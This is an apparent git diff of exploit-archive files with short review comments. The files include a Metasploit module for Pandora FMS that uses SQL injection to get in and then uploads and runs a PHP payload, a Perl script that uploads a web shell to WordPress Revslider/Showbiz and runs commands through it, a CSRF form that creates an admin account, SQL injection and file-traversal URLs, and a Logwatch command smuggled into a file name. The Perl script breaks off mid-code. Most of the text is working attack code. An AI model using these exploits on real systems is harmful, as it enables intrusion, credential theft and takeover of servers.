Executable file
7
platforms/linux/remote/35386.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/46554/info
|
||||
|
||||
Logwatch is prone to a local privilege-escalation vulnerability.
|
||||
|
||||
Local attackers can exploit this issue execute arbitrary code with superuser privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.
|
||||
|
||||
% echo "fake" > â??/var/log/httpd/fakee;who;access_log.2â??
|
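Review bot: The only PoC line is unusable as written because its quote characters were mis-encoded: `% echo "fake" > â??/var/log/httpd/fakee;who;access_log.2â??` should read `% echo "fake" > '/var/log/httpd/fakee;who;access_log.2'`, otherwise the shell splits on the `;` instead of creating one file with that name. The four-line summary also omits the mechanism and the preconditions: it presumably works because logwatch, running from root's cron, passes the log file name unquoted to a shell so the embedded `;who;` executes, and it requires the attacker to already be able to create files under `/var/log/httpd`, which is not a default unprivileged capability and should be stated. The affected version range and the upstream fix are missing as well; an advisory that says only "is prone to" gives defenders nothing to check against.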
317
platforms/php/remote/35380.rb
Executable file
317
platforms/php/remote/35380.rb
Executable file
|
@ -0,0 +1,317 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'Pandora FMS SQLi Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module attempts to exploit multiple issues in order to gain remote
|
||||
code execution under Pandora FMS version <= 5.0 SP2. First, an attempt
|
||||
to authenticate using default credentials is performed. If this method
|
||||
fails, a SQL injection vulnerability is leveraged in order to extract
|
||||
the "Auto Login" password hash. If this value is not set, the module
|
||||
will then extract the administrator account's MD5 password hash.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Lincoln <Lincoln[at]corelan.be>', # Discovery, Original Proof of Concept
|
||||
'Jason Kratzer <pyoor[at]corelan.be>' # Metasploit Module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://pandorafms.com/downloads/whats_new_5-SP3.pdf'],
|
||||
['URL', 'http://blog.pandorafms.org/?p=2041']
|
||||
],
|
||||
'Platform' => 'php',
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' =>
|
||||
[
|
||||
['Pandora FMS version <= 5.0 SP2', {}]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 50000,
|
||||
'DisableNops' => true,
|
||||
},
|
||||
'DisclosureDate' => "Feb 1 2014",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('TARGETURI', [true, 'The URI of the vulnerable Pandora FMS instance', '/pandora_console/']),
|
||||
OptString.new('USER', [false, 'The username to authenticate with', 'admin']),
|
||||
OptString.new('PASS', [false, 'The password to authenticate with', 'pandora']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def uri
|
||||
target_uri.path
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
vprint_status("#{peer} - Trying to detect installed version")
|
||||
|
||||
version = nil
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(uri, 'index.php')
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.body =~ /Pandora FMS - the Flexible Monitoring System/
|
||||
if res.body =~ /<div id="ver_num">v(.*?)<\/div>/
|
||||
version = $1
|
||||
else
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
end
|
||||
|
||||
unless version.nil?
|
||||
vprint_status("#{peer} - Pandora FMS #{version} found")
|
||||
if Gem::Version.new(version) <= Gem::Version.new('5.0SP2')
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
|
||||
# Attempt to login with credentials (default admin:pandora)
|
||||
def authenticate
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(uri, 'index.php'),
|
||||
'vars_get' => {
|
||||
'login' => "1",
|
||||
},
|
||||
'vars_post' => {
|
||||
'nick' => datastore['USER'],
|
||||
'pass' => datastore['PASS'],
|
||||
'Login' => 'Login',
|
||||
}
|
||||
})
|
||||
|
||||
return auth_succeeded?(res)
|
||||
end
|
||||
|
||||
# Attempt to login with auto login and SQLi
|
||||
def login_hash
|
||||
clue = rand_text_alpha(8)
|
||||
sql_clue = clue.each_byte.map { |b| b.to_s(16) }.join
|
||||
# select value from tconfig where token = 'loginhash_pwd';
|
||||
sqli = "1' AND (SELECT 2243 FROM(SELECT COUNT(*),CONCAT(0x#{sql_clue},(SELECT MID((IFNULL(CAST"
|
||||
sqli << "(value AS CHAR),0x20)),1,50) FROM tconfig WHERE token = 0x6c6f67696e686173685f707764 "
|
||||
sqli << "LIMIT 0,1),0x#{sql_clue},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP "
|
||||
sqli << "BY x)a) AND 'msf'='msf"
|
||||
|
||||
password = inject_sql(sqli, clue)
|
||||
|
||||
if password && password.length != 0
|
||||
print_status("#{peer} - Extracted auto login password (#{password})")
|
||||
else
|
||||
print_error("#{peer} - No auto login password has been defined!")
|
||||
return false
|
||||
end
|
||||
|
||||
print_status("#{peer} - Attempting to authenticate using (admin:#{password})")
|
||||
# Attempt to login using login hash password
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(uri, 'index.php'),
|
||||
'vars_get' => {
|
||||
'loginhash' => 'auto',
|
||||
},
|
||||
'vars_post' => {
|
||||
'loginhash_data' => Rex::Text.md5("admin#{password}"),
|
||||
'loginhash_user' => 'admin',
|
||||
}
|
||||
})
|
||||
|
||||
return auth_succeeded?(res)
|
||||
end
|
||||
|
||||
|
||||
def auth_succeeded?(res)
|
||||
if res && res.code == 200 && res.body.include?('Welcome to Pandora FMS')
|
||||
print_status("#{peer} - Successfully authenticated!")
|
||||
print_status("#{peer} - Attempting to retrieve session cookie")
|
||||
@cookie = res.get_cookies
|
||||
if @cookie.include?('PHPSESSID')
|
||||
print_status("#{peer} - Successfully retrieved session cookie: #{@cookie}")
|
||||
return true
|
||||
else
|
||||
print_error("#{peer} - Error retrieving cookie!")
|
||||
end
|
||||
else
|
||||
print_error("#{peer} - Authentication failed!")
|
||||
end
|
||||
|
||||
false
|
||||
end
|
||||
|
||||
|
||||
def extract
|
||||
# Generate random string and convert to hex
|
||||
clue = rand_text_alpha(8)
|
||||
hex_clue = clue.each_byte.map { |b| b.to_s(16) }.join
|
||||
|
||||
# select password from tusuario where id_user = 0;
|
||||
sqli = "test' AND (SELECT 5612 FROM(SELECT COUNT(*),CONCAT(0x#{hex_clue},(SELECT MID((IFNULL"
|
||||
sqli << "(CAST(password AS CHAR),0x20)),1,50) FROM tusuario WHERE id_user = 0 LIMIT 0,1)"
|
||||
sqli << ",0x#{hex_clue},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY "
|
||||
sqli << "x)a) AND 'msf'='msf"
|
||||
|
||||
password = inject_sql(sqli, clue)
|
||||
|
||||
if password && password.length != 0
|
||||
print_good("#{peer} - Extracted admin password hash, unsalted md5 - [ #{password} ]")
|
||||
else
|
||||
print_error("#{peer} - Unable to extract password hash!")
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def inject_sql(sql, fence_post)
|
||||
# Extract password hash from database
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(uri, 'mobile', 'index.php'),
|
||||
'vars_post' => {
|
||||
'action' => 'login',
|
||||
'user' => sql,
|
||||
'password' => 'pass',
|
||||
'input' => 'Login'
|
||||
}
|
||||
})
|
||||
|
||||
result = nil
|
||||
if res && res.code == 200
|
||||
match = res.body.match(/(?<=#{fence_post})(.*)(?=#{fence_post})/)
|
||||
if match
|
||||
result = match[1]
|
||||
else
|
||||
print_error("#{peer} - SQL injection failed")
|
||||
end
|
||||
end
|
||||
result
|
||||
end
|
||||
|
||||
def upload
|
||||
# Extract hash and hash2 from response
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'cookie' => @cookie,
|
||||
'uri' => normalize_uri(uri, 'index.php'),
|
||||
'vars_get' => {
|
||||
'sec' => 'gsetup',
|
||||
'sec2' => 'godmode/setup/file_manager'
|
||||
}
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.body =~ /(?<=input type="submit" id="submit-go")(.*)(?=<input id="hidden-directory" name="directory" type="hidden")/
|
||||
form = $1
|
||||
|
||||
# Extract hash
|
||||
if form =~ /(?<=name="hash" type="hidden" value=")(.*?)(?=" \/>)/
|
||||
hash = $1
|
||||
else
|
||||
print_error("#{peer} - Could not extract hash from response!")
|
||||
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
|
||||
end
|
||||
|
||||
# Extract hash2
|
||||
if form =~ /(?<=name="hash2" type="hidden" value=")(.*?)(?=" \/>)/
|
||||
hash2 = $1
|
||||
else
|
||||
print_error("#{peer} - Could not extract hash2 from response!")
|
||||
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
|
||||
end
|
||||
|
||||
# Extract real_directory
|
||||
if form =~ /(?<=name="real_directory" type="hidden" value=")(.*?)(" \/>)/
|
||||
real_directory = $1
|
||||
else
|
||||
print_error("#{peer} - Could not extract real_directory from response!")
|
||||
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
|
||||
end
|
||||
else
|
||||
print_error("#{peer} - Could not identify upload form!")
|
||||
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
|
||||
end
|
||||
|
||||
|
||||
# Upload script
|
||||
@payload_name = "#{rand_text_alpha(8)}.php"
|
||||
post_data = Rex::MIME::Message.new
|
||||
post_data.add_part("<?php #{payload.encoded} ?>", 'text/plain', nil, %Q^form-data; name="file"; filename="#{@payload_name}"^)
|
||||
post_data.add_part('', nil, nil, 'form-data; name="unmask"')
|
||||
post_data.add_part('Go', nil, nil, 'form-data; name="go"')
|
||||
post_data.add_part(real_directory, nil, nil, 'form-data; name="real_directory"')
|
||||
post_data.add_part('images', nil, nil, 'form-data; name="directory"')
|
||||
post_data.add_part("#{hash}", nil, nil, 'form-data; name="hash"')
|
||||
post_data.add_part("#{hash2}", nil, nil, 'form-data; name="hash2"')
|
||||
post_data.add_part('1', nil, nil, 'form-data; name="upload_file_or_zip"')
|
||||
|
||||
print_status("#{peer} - Attempting to upload payload #{@payload_name}...")
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'cookie' => @cookie,
|
||||
'uri' => normalize_uri(uri, 'index.php'),
|
||||
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
|
||||
'data' => post_data.to_s,
|
||||
'vars_get' => {
|
||||
'sec' => 'gsetup',
|
||||
'sec2' => 'godmode/setup/file_manager'
|
||||
}
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.body.include?("Upload correct")
|
||||
register_file_for_cleanup(@payload_name)
|
||||
print_status("#{peer} - Successfully uploaded payload")
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
# First try to authenticate using default or user-supplied credentials
|
||||
print_status("#{peer} - Attempting to authenticate using (#{datastore['USER']}:#{datastore['PASS']})")
|
||||
auth = authenticate
|
||||
|
||||
unless auth
|
||||
print_status("#{peer} - Attempting to extract auto login hash via SQLi")
|
||||
auth = login_hash
|
||||
end
|
||||
|
||||
unless auth
|
||||
print_status("#{peer} - Attempting to extract admin password hash with SQLi")
|
||||
extract
|
||||
fail_with(Failure::NoAccess, "#{peer} - Unable to perform remote code execution!")
|
||||
end
|
||||
|
||||
print_status("#{peer} - Uploading PHP payload...")
|
||||
upload
|
||||
|
||||
print_status("#{peer} - Executing payload...")
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(uri, 'images', @payload_name),
|
||||
'cookie' => @cookie
|
||||
}, 1)
|
||||
end
|
||||
end
|
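--- a/platforms/php/webapps/35344.txt
+++ b/platforms/php/webapps/35344.txt
@@ -0,0 +1,48 @@
+# Title : RobotStats v1.0 (robot param) SQL Injection Vulnerability
+# Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
+# Home : http://milw00rm.com / its online
+# Twitter : https://twitter.com/milw00rm or @milw00rm
+# Date : 22.11.2014
+# Demo : http://alpesoiseaux.free.fr/robotstats/
+# Download : http://www.robotstats.com/en/robotstats.zip
+# Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
+# Birkaciyiadam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali :)) )
+
+sql inj.:
+
+target.com/robotstats/admin/robots.php?rub=modif&robot=0x90+union+select+1,2,3,4,5,database(),7,8,9,10
+
+you look other files for sql example (/robotstats/info-robot.php?robot=?)
+
+analysis: (/admin/robots.php)
+
+no security for admin folder (session control, login panel or anyone... maybe its different vulnerability)
+
+include "robots.lib.php"; //line 26
+
+else if ($rub == "modif")
+{
+formulaireRobot($robot); //line 44 (we will be analysis to robots.lib.php for line)
+}
+
+analysis: (/admin/robots.lib.php)
+
+function formulaireRobot($robot) //line 71 (remember function line 44 in robots.php)
+{
+global $RS_LANG, $RS_LANGUE, $RS_TABLE_ROBOTS, $RS_DETECTION_USER_AGENT, $RS_DETECTION_IP;
+
+if ($robot != -1)
+{
+$title = $RS_LANG["ModifyRobot"];
+$sql = "SELECT *";
+$sql .= " FROM ".$RS_TABLE_ROBOTS;
+$sql .= " WHERE id=".$robot; // line 80 (ver yansin amuga goyum!!!)
+$res = mysql_query($sql) or erreurServeurMySQL($sql);
+$enr = mysql_fetch_array($res);
+$rub = "modif";
+$actif = $enr["actif"];
+} //line 85
+
+for demo:
+
+http://alpesoiseaux.free.fr/robotstats/admin/robots.php?rub=modif&robot=0x90+union+select+1,2,3,4,5,database(),7,8,9,10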
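Review bot: The advisory quotes the sink `$sql .= " WHERE id=".$robot;` but offers no remediation; since `id` is numeric the minimal fix is `$sql .= " WHERE id=".intval($robot);` (or a prepared statement), and the `/admin/` directory should sit behind the application's session check, which the text says is absent. The UNION payload presumes ten columns in the robots table and relies on MySQL accepting the `0x90` hex literal, so readers should expect to adjust the column count on other builds. The same pattern is claimed for `info-robot.php?robot=`, but no evidence for that file is shown, so that line should be marked as untested.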
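--- a/platforms/php/webapps/35376.txt
+++ b/platforms/php/webapps/35376.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46507/info
+
+mySeatXT is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+mySeatXT 0.164 is vulnerable; other versions may also be affected.
+
+http://www.example.com/myseatxt/contactform/cancel.php?lang=../../../../../../../../windows/system.ini%00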
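Review bot: The PoC `cancel.php?lang=../../../../../../../../windows/system.ini%00` depends on null-byte truncation of the include path, which PHP stopped honouring in 5.3.4, and the advisory should say so next to the URL. Without the truncation the traversal only reaches arbitrary files if `cancel.php` builds the include path without appending a suffix, which this text does not show, so the caveat matters for anyone verifying the finding on a current interpreter. The Windows-only target path is also worth complementing with a Unix example such as `/etc/passwd`.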
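--- a/platforms/php/webapps/35381.txt
+++ b/platforms/php/webapps/35381.txt
@@ -0,0 +1,79 @@
+Advisory ID: HTB23240
+Product: xEpan
+Vendor: Xavoc Technocrats Pvt. Ltd.
+Vulnerable Version(s): 1.0.1 and probably prior
+Tested Version: 1.0.1
+Advisory Publication: October 22, 2014 [without technical details]
+Vendor Notification: October 22, 2014
+Public Disclosure: November 26, 2014
+Vulnerability Type: Cross-Site Request Forgery [CWE-352]
+CVE Reference: CVE-2014-8429
+Risk Level: Medium
+CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
+Solution Status: Not Fixed
+Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
+
+-----------------------------------------------------------------------------------------------
+
+Advisory Details:
+
+High-Tech Bridge Security Research Lab discovered vulnerability in xEpan, which can be exploited to compromise vulnerable web site.
+
+
+1) ?ross-Site Request Forgery (CSRF) in xEpan: CVE-2014-8429
+
+The vulnerability exists due to insufficient validation of the HTTP request origin when creating new user accounts. A remote unauthenticated attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit, create new account with administrative privileges and get total control over the vulnerable website.
+
+A simple CSRF exploit below creates an administrative account with username "immuniweb" and password "password":
+
+
+<form action="http://[host]/?page=owner/users&web_owner_users_crud_virtualpage=add&submit=web_web_owner_users_crud_virtualpage_form" method="post" name="main">
+<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_name" value="name">
+<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_email" value="email@email.com">
+<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_username" value="immuniweb">
+<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_password" value="password">
+<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_created_at" value="21/10/2014">
+<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_type" value="100">
+<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_is_active" value="1">
+<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_activation_code" value="">
+<input type="hidden" name="web_web_owner_users_crud_virtualpage_form_last_login_date" value="">
+<input type="hidden" name="ajax_submit" value="form_submit">
+<input type="submit" id="btn">
+</form>
+
+<script>
+document.main.submit();
+</script>
+
+
+-----------------------------------------------------------------------------------------------
+
+Solution:
+
+Currently we are not aware of any official solution for this vulnerability.
+
+<b>Disclosure timeline:</b>
+2014-10-22 Vendor notified via several emails.
+2014-10-22 Vendor denies vulnerability.
+2014-11-06 Vulnerability is confirmed in the latest version of xEpan 1.0.4 which was released on the 2nd of November (we initially suspected a "silent fix").
+2014-11-06 Vulnerability confirmed in 1.0.4 as well. Vendor notified about the problem once again.
+2014-11-10 Fix requested via several emails.
+2014-11-17 Fix requested via several emails.
+2014-11-24 Fix requested via several emails.
+2014-11-24 Vulnerability still exist in latest version 1.0.4.1 which was released at November, 20.
+2014-11-26 Public disclosure.
+
+
+-----------------------------------------------------------------------------------------------
+
+References:
+
+[1] High-Tech Bridge Advisory HTB23240 - https://www.htbridge.com/advisory/HTB23240 - ?ross-Site Request Forgery (CSRF) in xEpan.
+[2] xEpan - http://www.xepan.org/ - xEpan is a an open source content management system (CMS) with Drag & Drop, bootstrap and live text editing.
+[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
+[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
+[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
+
+-----------------------------------------------------------------------------------------------
+
+Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.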
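--- a/platforms/php/webapps/35385.pl
+++ b/platforms/php/webapps/35385.pl
@@ -0,0 +1,289 @@
+#!/usr/bin/perl
+#
+# Title: Slider Revolution/Showbiz Pro shell upload exploit
+# Author: Simo Ben youssef
+# Contact: Simo_at_Morxploit_com
+# Discovered: 15 October 2014
+# Coded: 15 October 2014
+# Updated: 25 November 2014
+# Published: 25 November 2014
+# MorXploit Research
+# http://www.MorXploit.com
+# Vendor: ThemePunch
+# Vendor url: http://themepunch.com
+# Software: Revslider/Showbiz Pro
+# Versions: <= 3.0.95 (Revslider) / Version: <= 1.7.1 (Showbiz Pro)
+# Products url:
+# http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380
+# http://codecanyon.net/item/showbiz-pro-responsive-teaser-wordpress-plugin/4720988
+# Vulnerable scripts:
+# revslider/revslider_admin.php
+# showbiz/showbiz_admin.php
+#
+# About the plugins:
+# The #1 Slider plugin, used by millions, slider revolution is an all-purpose slide displaying solution that allows for showing almost any
+# kind of content whith highly customizable, transitions, effects and custom animations.
+# Showbiz Pro is a responsive teaser displaying solution that allows you to show WordPress Posts or any Custom Content with a set
+# amount of teaser items.
+#
+# Description:
+# Slider Revolution and Showbiz Pro fail to check authentication in revslider_admin.php/showbiz_admin.php allowing an unauthenticated
+# attacker to abuse administrative features.
+# Some of the features include:
+# Creating/Deleting/Updating sliders
+# Importing/exporting sliders
+# Updading plugin
+# For a full list of functions please see revslider_admin.php/showbiz_admin.php
+#
+# PoC on revslider:
+# 1- Deleting a slider:
+# root@host:/home/rootuser# curl -v --data "action=revslider_ajax_action&client_action=delete_slider&data[sliderid]=1"
+# http://****.com/wp-admin/admin-ajax.php
+# * Connected to ****.com (**.**.**.**) port 80 (#0)
+# > POST /wp-admin/admin-ajax.php HTTP/1.1
+# > User-Agent: curl/7.35.0
+# > Host: ****.com
+# > Accept: */*
+# > Content-Length: 73
+# > Content-Type: application/x-www-form-urlencoded
+# >
+# * upload completely sent off: 73 out of 73 bytes
+# < HTTP/1.1 200 OK
+# < Date: Fri, 24 Oct 2014 23:25:07 GMT
+# * Server Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 is not blacklisted
+# < Server: Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
+# < X-Powered-By: PHP/5.4.18
+# < X-Robots-Tag: noindex
+# < X-Content-Type-Options: nosniff
+# < Expires: Wed, 11 Jan 1984 05:00:00 GMT
+# < Cache-Control: no-cache, must-revalidate, max-age=0
+# < Pragma: no-cache
+# < X-Frame-Options: SAMEORIGIN
+# < Set-Cookie: PHPSESSID=a23ex1c8a573f1d1xd28c301793ba022c; path=/
+# < Transfer-Encoding: chunked
+# < Content-Type: text/html; charset=UTF-8
+# <
+# * Connection #0 to host http://****.com left intact
+#
+# {"success":true,"message":"The slider deleted","is_redirect":true,"redirect_url":"http:\/\/****.com\/wp-admin\/admin.php?page=revslider&view=sliders"}
+#
+# 2- Uploading an web shell:
+# The following perl exploit will try to upload an HTTP php shell through the the update_plugin function
+# To use the exploit make sure you download first the revslider.zip and showbiz.zip files which contain cmd.php
+# http://www.morxploit.com/morxploits/revslider.zip
+# http://www.morxploit.com/morxploits/showbiz.zip
+# and save them it in the same directory where you have the exploit.
+#
+# Demo:
+# perl morxrev.pl http://localhost revslider
+# ===================================================
+# --- Revslider/Showbiz shell upload exploit
+# --- By: Simo Ben youssef <simo_at_morxploit_com>
+# --- MorXploit Research www.MorXploit.com
+# ===================================================
+# [*] Target set to revslider
+# [*] MorXploiting http://localhost
+# [*] Sent payload
+# [+] Payload successfully executed
+# [*] Checking if shell was uploaded
+# [+] Shell successfully uploaded
+#
+# Linux MorXploit 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
+# uid=33(www-data) gid=33(www-data) groups=33(www-data)
+#
+# www-data@MorXploit:~$
+#
+# Download:
+# Exploit:
+# http://www.morxploit.com/morxploits/morxrevbiz.pl
+# Exploit update zip files:
+# http://www.morxploit.com/morxploits/revslider.zip
+# http://www.morxploit.com/morxploits/showbiz.zip
+#
+# Requires LWP::UserAgent
+# apt-get install libwww-perl
+# yum install libwww-perl
+# perl -MCPAN -e 'install Bundle::LWP'
+# For SSL support:
+# apt-get install liblwp-protocol-https-perl
+# yum install perl-Crypt-SSLeay
+#
+# Mitigation:
+# Besides the recently LFI vulnerability that was published couple months ago, this is another vulnerability that revslider developers have
+# decided to patch without releasing a full security advisory, leaving thousands of revslider users who didn't update their plugin to the
+# latest version (=> 3.0.96) vulnerable to this nasty flaw, revsliders developers will argue the fact that their slider comes with an
+# auto-update feature, but the problem is that this plugin is bundled with a lot of themes, which means that those themes users may not get
+# plugin updates or will have to pay to get the update. In other words revslider developers believe that every user should have the
+# auto-update feature on, otherwise ... you are screwed.
+# Obviously this is way more critical than the LFI vulnerability because it allows shell access giving attackers access to the target system
+# as well as the ability to dump the entire wordpress database locally.
+# That being said, upgrade immediately to the latest version or disable/switch to another plugin.
+# As for Showbiz Pro, sadly the vulnerability has never been patched as we successfully exploited it in the latest version (1.7.1).
+#
+# Author disclaimer:
+# The information contained in this entire document is for educational, demonstration and testing purposes only.
+# Author cannot be held responsible for any malicious use or damage. Use at your own risk.
+#
+# Got comments or questions?
+# Simo_at_MorXploit_dot_com
+#
+# Did you like this exploit?
+# Feel free to buy me a beer =)
+# My btc address: 1Ko12CUAFoWn8syrvg4aQokFedNiwD6d7u
+# Cheers!
+
+use LWP::UserAgent;
+use MIME::Base64;
+use strict;
+
+sub banner {
+system(($^O eq 'MSWin32') ? 'cls' : 'clear');
+print "===================================================\n";
+print "--- Revslider/Showbiz shell upload exploit\n";
+print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
+print "--- MorXploit Research www.MorXploit.com\n";
+print "===================================================\n";
+}
+
+if (!defined ($ARGV[0] && $ARGV[1])) {
+banner();
+print "perl $0 <target> <plugin>\n";
+print "perl $0 http://localhost revslider\n";
+print "perl $0 http://localhost showbiz\n";
+exit;
+}
+
+my $zip1 = "revslider.zip";
+my $zip2 = "showbiz.zip";
+
+unless (-e ($zip1 && $zip2))
+{
+banner();
+print "[-] $zip1 or $zip2 not found! RTFM\n";
+exit;
+}
+
+my $host = $ARGV[0];
+my $plugin = $ARGV[1];
+my $action;
+my $update_file;
+
+if ($plugin eq "revslider") {
+$action = "revslider_ajax_action";
+$update_file = "$zip1";
+}
+elsif ($plugin eq "showbiz") {
+$action = "showbiz_ajax_action";
+$update_file = "$zip2";
+}
+else {
+banner();
+print "[-] Wrong plugin name\n";
+print "perl $0 <target> <plugin>\n";
+print "perl $0 http://localhost revslider\n";
+print "perl $0 http://localhost showbiz\n";
+exit;
+}
+my $target = "wp-admin/admin-ajax.php";
+my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php";
+
+sub randomagent {
+my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
+'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
+'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
+'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
+'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
+'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
+);
+my $random = $array[rand @array];
+return($random);
+}
+my $useragent = randomagent();
+
+my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
+$ua->timeout(10);
+$ua->agent($useragent);
+my $status = $ua->get("$host/$target");
+unless ($status->is_success) {
+banner();
+print "[-] Xploit failed: " . $status->status_line . "\n";
+exit;
+}
+
+banner();
+print "[*] Target set to $plugin\n";
+print "[*] MorXploiting $host\n";
+
+my $exploit = $ua->post("$host/$target", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);
+
+print "[*] Sent payload\n";
+
+if ($exploit->decoded_content =~ /Wrong update extracted folder/) {
+print "[+] Payload successfully executed\n";
+}
+
+elsif ($exploit->decoded_content =~ /Wrong request/) {
+print "[-] Payload failed: Not vulnerable\n";
+exit;
+}
+
+elsif ($exploit->decoded_content =~ m/0$/) {
+print "[-] Payload failed: Plugin unavailable\n";
+exit;
+}
+
+else {
+$exploit->decoded_content =~ /<\/b>(.*?)<br>/;
+print "[-] Payload failed:$1\n";
+print "[-] " . $exploit->decoded_content unless (defined $1);
+print "\n";
+exit;
+}
+
+print "[*] Checking if shell was uploaded\n";
+
+sub rndstr{ join'', @_[ map{ rand @_ } 1 .. shift ] }
+my $rndstr = rndstr(8, 1..9, 'a'..'z');
+my $cmd1 = encode_base64("echo $rndstr");
+my $status = $ua->get("$host/$shell?cmd=$cmd1");
+
+if ($status->decoded_content =~ /system\(\) has been disabled/) {
+print "[-] Xploit failed: system() has been disabled\n";
+exit;
+}
+
+elsif ($status->decoded_content !~ /$rndstr/) {
+print "[-] Xploit failed: " . $status->status_line . "\n";
+exit;
+}
+
+elsif ($status->decoded_content =~ /$rndstr/) {
+print "[+] Shell successfully uploaded\n";
+}
+my $cmd2 = encode_base64("whoami");
+my $whoami = $ua->get("$host/$shell?cmd=$cmd2");
+my $cmd3 = encode_base64("uname -n");
+my $uname = $ua->get("$host/$shell?cmd=$cmd3");
+my $cmd4 = encode_base64("id");
+my $id = $ua->get("$host/$shell?cmd=$cmd4");
+my $cmd5 = encode_base64("uname -a");
+my $unamea = $ua->get("$host/$shell?cmd=$cmd5");
+print $unamea->decoded_content;
+print $id->decoded_content;
+my $wa = $whoami->decoded_content;
+my $un = $uname->decoded_content;
+chomp($wa);
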